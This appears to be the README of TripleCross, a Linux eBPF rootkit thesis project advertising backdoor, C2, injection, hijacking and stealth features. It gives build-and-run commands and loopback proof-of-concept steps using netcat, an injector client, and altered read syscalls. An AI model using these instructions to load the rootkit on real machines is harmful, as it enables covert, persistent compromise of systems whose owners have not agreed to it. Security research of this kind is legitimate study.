A Linux eBPF rootkit with a backdoor, C2, library injection, execution hijacking, persistence and stealth capabilities.

allripples/TripleCross

TFG

Build and run

cd src
make
sudo ./bin/kit -t <network interface>

Network interface used for PoC: lo

PoC 0 - Modifying incoming traffic

Option 1: With netcat

Terminal 1:

nc -l 9000

Terminal 2:

echo -n "XDP_PoC_0" | nc 127.0.0.1 9000

Option 2: With the in-built client

cd src/client
sudo ./injector -S 127.0.0.1

PoC 1 - Modifying arguments of read syscalls

echo "This won't be seen" > /tmp/txt.txt
cat /tmp/txt.txt
